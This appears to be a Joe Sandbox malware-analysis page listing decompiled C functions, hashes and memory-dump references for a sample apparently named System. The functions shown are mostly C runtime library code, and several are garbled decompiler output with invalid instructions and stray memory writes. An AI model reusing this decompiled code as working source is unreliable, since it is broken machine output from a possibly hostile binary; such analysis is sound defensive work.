                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                              • Opcode ID: f20d77103b889fb3d48d935381dcbff85f41f6cd95c899680745e861acb3dc64
                                                                                                                                                              • Instruction ID: 45c1b395500ee489cf5b70d3290822266116206cd65f4dabaabe1703c27623db
                                                                                                                                                              • Opcode Fuzzy Hash: f20d77103b889fb3d48d935381dcbff85f41f6cd95c899680745e861acb3dc64
                                                                                                                                                              • Instruction Fuzzy Hash: 15F03A6BB6964392FB554B70E8D43742770AF88F84F04103AD60FC76A4CE2EE588C30A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C6528C Relevance: 7.8, APIs: 5, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E00007FF67FF6E4C6528C(void* __ecx, void* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, signed char* __r8, signed char* __r9, long long _a8, long long _a16, long long _a24) {
				long long _v40;
				void* _t39;
				void* _t41;
				void* _t48;
				void* _t78;
				long long _t82;
				long long _t97;
				long long* _t122;
				signed int* _t132;

				_t78 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t132 = __r9;
				if (__r8[4] == _t48) goto 0xe4c652c8;
				E00007FF67FF6E4C63DE8(__rax);
				goto 0xe4c652ce;
				r15d = _t48;
				if (0 == 0) goto 0xe4c6544e;
				if (r15d == 0) goto 0xe4c652ed;
				E00007FF67FF6E4C63DE8(_t78);
				goto 0xe4c652f0;
				if ( *0x00000010 == dil) goto 0xe4c6544e;
				if (__r8[8] != 0) goto 0xe4c65307;
				if ( *__r8 >= 0) goto 0xe4c6544e;
				if ( *__r8 < 0) goto 0xe4c65315;
				_t122 = __r8[8] +  *__rdx;
				if (( *__r8 & 0x00000080) == 0) goto 0xe4c6534c;
				if (( *__r9 & 0x00000010) == 0) goto 0xe4c6534c;
				_t82 =  *0xe4cab158; // 0x0
				if (_t82 == 0) goto 0xe4c6534c;
				_t39 =  *0xe4c894c0();
				if (_t82 == 0) goto 0xe4c6546a;
				if (_t122 == 0) goto 0xe4c6546a;
				 *_t122 = _t82;
				goto 0xe4c653ab;
				if (( *__r8 & 0x00000008) == 0) goto 0xe4c6536c;
				_t97 =  *((intOrPtr*)(__rcx + 0x28));
				if (_t97 == 0) goto 0xe4c6546f;
				if (_t122 == 0) goto 0xe4c6546f;
				 *_t122 = _t97;
				goto 0xe4c653ab;
				if (( *__r9 & 0x00000001) == 0) goto 0xe4c653bc;
				if ( *((intOrPtr*)(__rcx + 0x28)) == 0) goto 0xe4c65474;
				if (_t122 == 0) goto 0xe4c65474;
				E00007FF67FF6E4C64380();
				if (__r9[0x14] != 8) goto 0xe4c6544a;
				if ( *_t122 == 0) goto 0xe4c6544a;
				E00007FF67FF6E4C6410C(_t39,  *_t122,  &(__r9[8]));
				 *_t122 = _t82;
				goto 0xe4c6544a;
				if (_t132[6] == _t48) goto 0xe4c653d1;
				_t41 = E00007FF67FF6E4C63DFC(_t82);
				goto 0xe4c653d6;
				if (0 != 0) goto 0xe4c6540f;
				if ( *((intOrPtr*)(__rcx + 0x28)) == 0) goto 0xe4c65479;
				if (_t122 == 0) goto 0xe4c65479;
				E00007FF67FF6E4C6410C(_t41,  *((intOrPtr*)(__rcx + 0x28)),  &(_t132[2]));
				E00007FF67FF6E4C64380();
				goto 0xe4c6544a;
				if ( *((intOrPtr*)(__rcx + 0x28)) == 0) goto 0xe4c6547e;
				if (_t122 == 0) goto 0xe4c6547e;
				if (_t132[5] == 0) goto 0xe4c6542f;
				E00007FF67FF6E4C63DFC(_t82);
				goto 0xe4c65432;
				if (0 == 0) goto 0xe4c6547e;
				asm("sbb ecx, ecx");
				_v40 = 0xbadbae;
				goto 0xe4c65450;
				return  ~( *_t132 & 0x00000004);
			}












                                                                                                                                                              0x7ff6e4c6528c
                                                                                                                                                              0x7ff6e4c6528c
                                                                                                                                                              0x7ff6e4c65291
                                                                                                                                                              0x7ff6e4c65296
                                                                                                                                                              0x7ff6e4c652a5
                                                                                                                                                              0x7ff6e4c652b7
                                                                                                                                                              0x7ff6e4c652bd
                                                                                                                                                              0x7ff6e4c652c6
                                                                                                                                                              0x7ff6e4c652cb
                                                                                                                                                              0x7ff6e4c652d1
                                                                                                                                                              0x7ff6e4c652da
                                                                                                                                                              0x7ff6e4c652dc
                                                                                                                                                              0x7ff6e4c652eb
                                                                                                                                                              0x7ff6e4c652f4
                                                                                                                                                              0x7ff6e4c652fd
                                                                                                                                                              0x7ff6e4c65301
                                                                                                                                                              0x7ff6e4c65309
                                                                                                                                                              0x7ff6e4c65312
                                                                                                                                                              0x7ff6e4c65318
                                                                                                                                                              0x7ff6e4c6531e
                                                                                                                                                              0x7ff6e4c65320
                                                                                                                                                              0x7ff6e4c6532a
                                                                                                                                                              0x7ff6e4c6532c
                                                                                                                                                              0x7ff6e4c65335
                                                                                                                                                              0x7ff6e4c6533e
                                                                                                                                                              0x7ff6e4c65344
                                                                                                                                                              0x7ff6e4c6534a
                                                                                                                                                              0x7ff6e4c6534f
                                                                                                                                                              0x7ff6e4c65351
                                                                                                                                                              0x7ff6e4c65358
                                                                                                                                                              0x7ff6e4c65361
                                                                                                                                                              0x7ff6e4c65367
                                                                                                                                                              0x7ff6e4c6536a
                                                                                                                                                              0x7ff6e4c65370
                                                                                                                                                              0x7ff6e4c65379
                                                                                                                                                              0x7ff6e4c65382
                                                                                                                                                              0x7ff6e4c6538f
                                                                                                                                                              0x7ff6e4c65399
                                                                                                                                                              0x7ff6e4c653a2
                                                                                                                                                              0x7ff6e4c653af
                                                                                                                                                              0x7ff6e4c653b4
                                                                                                                                                              0x7ff6e4c653b7
                                                                                                                                                              0x7ff6e4c653c0
                                                                                                                                                              0x7ff6e4c653c6
                                                                                                                                                              0x7ff6e4c653cf
                                                                                                                                                              0x7ff6e4c653d9
                                                                                                                                                              0x7ff6e4c653df
                                                                                                                                                              0x7ff6e4c653e8
                                                                                                                                                              0x7ff6e4c653fa
                                                                                                                                                              0x7ff6e4c65408
                                                                                                                                                              0x7ff6e4c6540d
                                                                                                                                                              0x7ff6e4c65413
                                                                                                                                                              0x7ff6e4c65418
                                                                                                                                                              0x7ff6e4c6541c
                                                                                                                                                              0x7ff6e4c6541e
                                                                                                                                                              0x7ff6e4c6542d
                                                                                                                                                              0x7ff6e4c65435
                                                                                                                                                              0x7ff6e4c6543e
                                                                                                                                                              0x7ff6e4c65446
                                                                                                                                                              0x7ff6e4c6544c
                                                                                                                                                              0x7ff6e4c65469

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                              • Opcode ID: cab38ded3b901a016ec2b110b5e92ee53b72f54deac142631b12e35ec90ce533
                                                                                                                                                              • Instruction ID: 990dbadafc6c7f0dadde974190211d4ce7c6828296900e4cc42b9e9178ef9933
                                                                                                                                                              • Opcode Fuzzy Hash: cab38ded3b901a016ec2b110b5e92ee53b72f54deac142631b12e35ec90ce533
                                                                                                                                                              • Instruction Fuzzy Hash: 8EB1D83BAA965381EA658A35A4C033863B0AF44FC4F25C4B7DE4D87795DE3EE451830A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C7684C Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E00007FF67FF6E4C7684C(signed long long __ecx, void* __edi, signed long long* __rax, long long __rbx, signed short* __rdx, void* __r10, void* __r11, long long _a32) {
				char _v72;
				void* _v84;
				unsigned int _v88;
				long long _v96;
				long long _v100;
				long long _v104;
				signed int _v120;
				void* __rsi;
				void* __rbp;
				void* _t80;
				void* _t87;
				long _t88;
				void* _t99;
				void* _t100;
				void* _t103;
				void* _t109;
				void* _t110;
				intOrPtr _t129;
				signed long long _t143;
				intOrPtr _t145;
				unsigned long long _t152;
				signed long long* _t154;
				long long _t161;
				intOrPtr _t176;
				unsigned int _t182;
				signed short* _t187;
				void* _t188;
				void* _t192;
				void* _t201;
				signed long long _t202;
				void* _t203;
				signed long long _t205;
				void* _t206;
				signed short* _t207;
				signed long long _t209;

				_t201 = __r11;
				_t109 = __edi;
				_a32 = __rbx;
				r14d = r8d;
				_t187 = __rdx;
				_t202 = __ecx;
				if (r8d == 0) goto 0xe4c76b0c;
				if (__rdx != 0) goto 0xe4c7689a;
				E00007FF67FF6E4C6C834(__rax);
				 *__rax =  *__rax & 0x00000000;
				E00007FF67FF6E4C6C854(__rax);
				 *__rax = 0x16;
				_t80 = E00007FF67FF6E4C6A5D8();
				goto 0xe4c76b0e;
				_t205 = _t202 >> 6;
				_t209 = (_t202 & 0x0000003f) + (_t202 & 0x0000003f) * 8;
				sil =  *((intOrPtr*)(0xe4cab700 + 0x39 + _t209 * 8));
				if (_t80 - 1 > 0) goto 0xe4c768cb;
				_t143 =  !(_t188 - 1);
				if ((r14d & 0x00000001) == 0) goto 0xe4c7687a;
				if (( *(0xe4cab700 + 0x38 + _t209 * 8) & 0x00000020) == 0) goto 0xe4c768e1;
				r8d = 2;
				E00007FF67FF6E4C78FF8( *((intOrPtr*)(0xe4cab700 + _t205 * 8)), 0);
				_t103 = r12d;
				_v88 = 0;
				E00007FF67FF6E4C81C3C(_t103, _t143);
				if (_t143 == 0) goto 0xe4c769fa;
				_t145 =  *((intOrPtr*)(0xe4cab700 + _t205 * 8));
				if ( *(0xe4cab700 + 0x38 + _t209 * 8) - _t100 >= 0) goto 0xe4c769fa;
				E00007FF67FF6E4C75AC4(_t145, 0, 0, _t188);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x90)) + 0x138)) != 0) goto 0xe4c76938;
				if ( *((intOrPtr*)( *((intOrPtr*)(0xe4cab700 + _t205 * 8)) + 0x39 + _t209 * 8)) == _t100) goto 0xe4c769fa;
				GetConsoleMode(??, ??);
				if (0xe4cab700 == 0) goto 0xe4c769fa;
				if (sil == 0) goto 0xe4c769dc;
				sil = sil - 1;
				if (sil - 1 > 0) goto 0xe4c76a98;
				_t203 = _t187 + _t206;
				_v104 = 0;
				_t207 = _t187;
				if (_t187 - _t203 >= 0) goto 0xe4c769d5;
				_v72 =  *_t207 & 0x0000ffff;
				_t87 = E00007FF67FF6E4C81ED8(_t103);
				if (_t87 != _t103) goto 0xe4c769cc;
				_t161 = _v100 + 2;
				_v100 = _t161;
				if (_t103 != 0xa) goto 0xe4c769c1;
				 *0xB528E80000001A =  *((intOrPtr*)(0xb528e80000001a)) + dil;
				if (_t87 != _t103) goto 0xe4c769cc;
				_v100 = _t161 + 1;
				if ( &(_t207[1]) - _t203 >= 0) goto 0xe4c769d5;
				goto 0xe4c76981;
				_t88 = GetLastError();
				_v104 = 0xe4cab700;
				goto 0xe4c76a8e;
				r9d = r14d;
				E00007FF67FF6E4C75EF4(_t88, r12d, _t110,  &(_t207[1]) - _t203, 1,  &_v104,  &_v72, _t187, __r10);
				asm("movsd xmm0, [eax]");
				goto 0xe4c76a93;
				_t176 =  *((intOrPtr*)(0xe4cab700 + _t205 * 8));
				if ( *((intOrPtr*)(_t176 + 0x38 + _t209 * 8)) - _t100 >= 0) goto 0xe4c76a5b;
				_t129 = sil;
				if (_t129 == 0) goto 0xe4c76a47;
				if (_t129 == 0) goto 0xe4c76a33;
				if (_t176 - 1 != 1) goto 0xe4c76a98;
				r9d = r14d;
				E00007FF67FF6E4C764D4(_t100, r12d, 0xe4cab700,  *0x7FF6E4CAB708,  &_v104, _t192, _t187, __r10, _t201);
				goto 0xe4c769ee;
				r9d = r14d;
				E00007FF67FF6E4C765F0(r12d, _t109, 0xe4cab700,  *0x7FF6E4CAB708,  &_v104, _t192, _t187, __r10, _t201);
				goto 0xe4c769ee;
				r9d = r14d;
				E00007FF67FF6E4C763D0(_t100, sil, r12d, 0xe4cab700,  *0x7FF6E4CAB708,  &_v104, _t192, _t187, __r10, _t201);
				goto 0xe4c769ee;
				r8d = r14d;
				_v120 = _v120 & 0;
				_v104 = 0;
				_v96 = 0;
				WriteFile(??, ??, ??, ??, ??);
				if (0 != 0) goto 0xe4c76a8b;
				GetLastError();
				_v104 = 0;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				_t152 = _v88 >> 0x20;
				if (_t152 != 0) goto 0xe4c76b05;
				_t182 = _v88;
				if (_t182 == 0) goto 0xe4c76ad5;
				if (_t182 != 5) goto 0xe4c76acb;
				E00007FF67FF6E4C6C854(_t152);
				 *_t152 = 9;
				E00007FF67FF6E4C6C834(_t152);
				 *_t152 = 5;
				goto 0xe4c76892;
				E00007FF67FF6E4C6C7E4(sil, _t152, _v96);
				goto 0xe4c76892;
				_t154 =  *((intOrPtr*)(0xe4cab700 + _t205 * 8));
				if (( *(0xe4cab700 + 0x38 + _t209 * 8) & 0x00000040) == 0) goto 0xe4c76aed;
				if ( *_t187 == 0x1a) goto 0xe4c76b0c;
				E00007FF67FF6E4C6C854(_t154);
				 *0xe4cab700 = 0x1c;
				_t99 = E00007FF67FF6E4C6C834(_t154);
				 *_t154 =  *_t154 & 0x00000000;
				goto 0xe4c76892;
				goto 0xe4c76b0e;
				return _t99;
			}






































                                                                                                                                                              0x7ff6e4c7684c
                                                                                                                                                              0x7ff6e4c7684c
                                                                                                                                                              0x7ff6e4c7684c
                                                                                                                                                              0x7ff6e4c76863
                                                                                                                                                              0x7ff6e4c76866
                                                                                                                                                              0x7ff6e4c76869
                                                                                                                                                              0x7ff6e4c7686f
                                                                                                                                                              0x7ff6e4c76878
                                                                                                                                                              0x7ff6e4c7687a
                                                                                                                                                              0x7ff6e4c7687f
                                                                                                                                                              0x7ff6e4c76882
                                                                                                                                                              0x7ff6e4c76887
                                                                                                                                                              0x7ff6e4c7688d
                                                                                                                                                              0x7ff6e4c76895
                                                                                                                                                              0x7ff6e4c768aa
                                                                                                                                                              0x7ff6e4c768ae
                                                                                                                                                              0x7ff6e4c768b6
                                                                                                                                                              0x7ff6e4c768c0
                                                                                                                                                              0x7ff6e4c768c5
                                                                                                                                                              0x7ff6e4c768c9
                                                                                                                                                              0x7ff6e4c768d1
                                                                                                                                                              0x7ff6e4c768d8
                                                                                                                                                              0x7ff6e4c768dc
                                                                                                                                                              0x7ff6e4c768e3
                                                                                                                                                              0x7ff6e4c768e6
                                                                                                                                                              0x7ff6e4c768ea
                                                                                                                                                              0x7ff6e4c768f1
                                                                                                                                                              0x7ff6e4c768fe
                                                                                                                                                              0x7ff6e4c76907
                                                                                                                                                              0x7ff6e4c7690d
                                                                                                                                                              0x7ff6e4c76920
                                                                                                                                                              0x7ff6e4c76932
                                                                                                                                                              0x7ff6e4c7694c
                                                                                                                                                              0x7ff6e4c76954
                                                                                                                                                              0x7ff6e4c7695d
                                                                                                                                                              0x7ff6e4c7695f
                                                                                                                                                              0x7ff6e4c76966
                                                                                                                                                              0x7ff6e4c7696e
                                                                                                                                                              0x7ff6e4c76972
                                                                                                                                                              0x7ff6e4c76976
                                                                                                                                                              0x7ff6e4c7697c
                                                                                                                                                              0x7ff6e4c76988
                                                                                                                                                              0x7ff6e4c7698c
                                                                                                                                                              0x7ff6e4c76998
                                                                                                                                                              0x7ff6e4c7699a
                                                                                                                                                              0x7ff6e4c7699d
                                                                                                                                                              0x7ff6e4c769a4
                                                                                                                                                              0x7ff6e4c769af
                                                                                                                                                              0x7ff6e4c769b8
                                                                                                                                                              0x7ff6e4c769bc
                                                                                                                                                              0x7ff6e4c769c8
                                                                                                                                                              0x7ff6e4c769ca
                                                                                                                                                              0x7ff6e4c769cc
                                                                                                                                                              0x7ff6e4c769d2
                                                                                                                                                              0x7ff6e4c769d7
                                                                                                                                                              0x7ff6e4c769dc
                                                                                                                                                              0x7ff6e4c769e9
                                                                                                                                                              0x7ff6e4c769ee
                                                                                                                                                              0x7ff6e4c769f5
                                                                                                                                                              0x7ff6e4c76a01
                                                                                                                                                              0x7ff6e4c76a0a
                                                                                                                                                              0x7ff6e4c76a10
                                                                                                                                                              0x7ff6e4c76a13
                                                                                                                                                              0x7ff6e4c76a18
                                                                                                                                                              0x7ff6e4c76a1d
                                                                                                                                                              0x7ff6e4c76a1f
                                                                                                                                                              0x7ff6e4c76a2c
                                                                                                                                                              0x7ff6e4c76a31
                                                                                                                                                              0x7ff6e4c76a33
                                                                                                                                                              0x7ff6e4c76a40
                                                                                                                                                              0x7ff6e4c76a45
                                                                                                                                                              0x7ff6e4c76a47
                                                                                                                                                              0x7ff6e4c76a54
                                                                                                                                                              0x7ff6e4c76a59
                                                                                                                                                              0x7ff6e4c76a66
                                                                                                                                                              0x7ff6e4c76a69
                                                                                                                                                              0x7ff6e4c76a71
                                                                                                                                                              0x7ff6e4c76a75
                                                                                                                                                              0x7ff6e4c76a78
                                                                                                                                                              0x7ff6e4c76a80
                                                                                                                                                              0x7ff6e4c76a82
                                                                                                                                                              0x7ff6e4c76a88
                                                                                                                                                              0x7ff6e4c76a8e
                                                                                                                                                              0x7ff6e4c76a93
                                                                                                                                                              0x7ff6e4c76a9c
                                                                                                                                                              0x7ff6e4c76aa2
                                                                                                                                                              0x7ff6e4c76aa4
                                                                                                                                                              0x7ff6e4c76aa9
                                                                                                                                                              0x7ff6e4c76aae
                                                                                                                                                              0x7ff6e4c76ab0
                                                                                                                                                              0x7ff6e4c76ab5
                                                                                                                                                              0x7ff6e4c76abb
                                                                                                                                                              0x7ff6e4c76ac0
                                                                                                                                                              0x7ff6e4c76ac6
                                                                                                                                                              0x7ff6e4c76acb
                                                                                                                                                              0x7ff6e4c76ad0
                                                                                                                                                              0x7ff6e4c76adc
                                                                                                                                                              0x7ff6e4c76ae6
                                                                                                                                                              0x7ff6e4c76aeb
                                                                                                                                                              0x7ff6e4c76aed
                                                                                                                                                              0x7ff6e4c76af2
                                                                                                                                                              0x7ff6e4c76af8
                                                                                                                                                              0x7ff6e4c76afd
                                                                                                                                                              0x7ff6e4c76b00
                                                                                                                                                              0x7ff6e4c76b0a
                                                                                                                                                              0x7ff6e4c76b25

                                                                                                                                                              APIs
                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E4C7688D
                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6E4C7680B,?,?,FFFFFFFE,00007FF6E4C750C2), ref: 00007FF6E4C7694C
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6E4C7680B,?,?,FFFFFFFE,00007FF6E4C750C2), ref: 00007FF6E4C769CC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2210144848-0
                                                                                                                                                              • Opcode ID: 6fc08e10a9d61f4fb81cebe2106ff699c531d4e5e7fe382f550567236f19aa69
                                                                                                                                                              • Instruction ID: 82cc7940a31f04759caa9ceb841bf56175a12cff4fc32e6ffb88dd109dce573d
                                                                                                                                                              • Opcode Fuzzy Hash: 6fc08e10a9d61f4fb81cebe2106ff699c531d4e5e7fe382f550567236f19aa69
                                                                                                                                                              • Instruction Fuzzy Hash: 8B818E2BF5C65386E7509B7584C43BC2670AB88FA8F444137DA0E936D2DF3EA455C31A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C79DF0 Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                              • Opcode ID: 5f14a6787c6c0828e72ea556b5c3a65fbea0f2d2126c6c45ee3f7c27df79daa1
                                                                                                                                                              • Instruction ID: 17f4b78549cd0d995e5909a77ac9c74b98f3a1d46cbdf34bf3d6f346239cb988
                                                                                                                                                              • Opcode Fuzzy Hash: 5f14a6787c6c0828e72ea556b5c3a65fbea0f2d2126c6c45ee3f7c27df79daa1
                                                                                                                                                              • Instruction Fuzzy Hash: 3951972B98CD4757F7229B3894C837A6270BF41B94F044637EA5E979D0DF3FA481860A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C62080 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF67FF6E4C62080(long long __rbx, long long __rcx, long long __rsi) {
				void* _t10;
				void* _t12;
				signed long long _t15;
				signed long long _t29;
				void* _t31;

				 *((long long*)(_t31 + 8)) = __rcx;
				_t29 = _t31 - 0x50 + 0x30;
				 *((long long*)(_t29 + 0x48)) = __rbx;
				 *((long long*)(_t29 + 0x50)) = __rsi;
				_t15 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t29 + 0x10) = _t15 ^ _t29;
				if (__rcx != 0) goto 0xe4c620cf;
				return E00007FF67FF6E4C623B0(_t10, _t12,  *(_t29 + 0x10) ^ _t29);
			}








                                                                                                                                                              0x7ff6e4c62080
                                                                                                                                                              0x7ff6e4c6208d
                                                                                                                                                              0x7ff6e4c62092
                                                                                                                                                              0x7ff6e4c62096
                                                                                                                                                              0x7ff6e4c6209a
                                                                                                                                                              0x7ff6e4c620a4
                                                                                                                                                              0x7ff6e4c620ae
                                                                                                                                                              0x7ff6e4c620ce

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 262959230-0
                                                                                                                                                              • Opcode ID: 4cbf844b32132c7cbb0f3ddfd88c0da65fd116a87c6219a47e6959de01fa2b5b
                                                                                                                                                              • Instruction ID: b2945c67f0610b6c51b518ab293a70b39c81d4afbae6e7c5bfb1d3819a3c28b3
                                                                                                                                                              • Opcode Fuzzy Hash: 4cbf844b32132c7cbb0f3ddfd88c0da65fd116a87c6219a47e6959de01fa2b5b
                                                                                                                                                              • Instruction Fuzzy Hash: A641D42BA5864745EB14AF71988037922B0BF48FA4F1486B6DA6DC77D5CF3EE4418306
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C8498C Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                              			E00007FF67FF6E4C8498C(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed char _t24;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed long long _t37;
				signed long long _t38;
				signed int* _t46;

				_a8 = __rbx;
				_a16 = __rsi;
				_t37 = _t38 & 0x0000001f;
				_t46 = _t38;
				if ((__ecx & 0x00000008) == 0) goto 0xe4c849be;
				if (sil >= 0) goto 0xe4c849be;
				 *((long long*)(_t37 + 0x57ebf7e3)) =  *((long long*)(_t37 + 0x57ebf7e3)) + 1;
				asm("adc [eax+0xf], ecx");
				 *((long long*)(_t37 + 0x3cebfbe3)) =  *((long long*)(_t37 + 0x3cebfbe3)) + 1;
				_t28 = dil & 0x00000001;
				if (_t28 == 0) goto 0xe4c849f5;
				asm("dec eax");
				if (_t28 >= 0) goto 0xe4c849f5;
				 *((long long*)(_t37 + 0x20ebfee3)) =  *((long long*)(_t37 + 0x20ebfee3)) + 1;
				_t29 = dil & 0x00000002;
				if (_t29 == 0) goto 0xe4c84a15;
				asm("dec eax");
				if (_t29 >= 0) goto 0xe4c84a15;
				_t30 = dil & 0x00000010;
				if (_t30 == 0) goto 0xe4c84a12;
				 *((long long*)(_t37 - 0x9bf021d)) =  *((long long*)(_t37 - 0x9bf021d)) + 1;
				asm("invalid");
				if (_t30 == 0) goto 0xe4c84a2f;
				asm("dec eax");
				if (_t30 >= 0) goto 0xe4c84a2f;
				 *((long long*)(_t37 - 0x74b7101d)) =  *((long long*)(_t37 - 0x74b7101d)) + 1;
				if (_t30 == 0) goto 0xe4c84a57;
				asm("rol byte [ebp+0x5c8b48db], 0x24");
				 *_t46 =  *_t46 ^ __ecx;
				asm("ror byte [eax-0x7d], 0xc4");
				 *(_t46 - 0x3d) =  *(_t46 - 0x3d) & _t24;
			}










                                                                                                                                                              0x7ff6e4c8498c
                                                                                                                                                              0x7ff6e4c84991
                                                                                                                                                              0x7ff6e4c849a0
                                                                                                                                                              0x7ff6e4c849a3
                                                                                                                                                              0x7ff6e4c849a8
                                                                                                                                                              0x7ff6e4c849ad
                                                                                                                                                              0x7ff6e4c849b8
                                                                                                                                                              0x7ff6e4c849c7
                                                                                                                                                              0x7ff6e4c849d3
                                                                                                                                                              0x7ff6e4c849d9
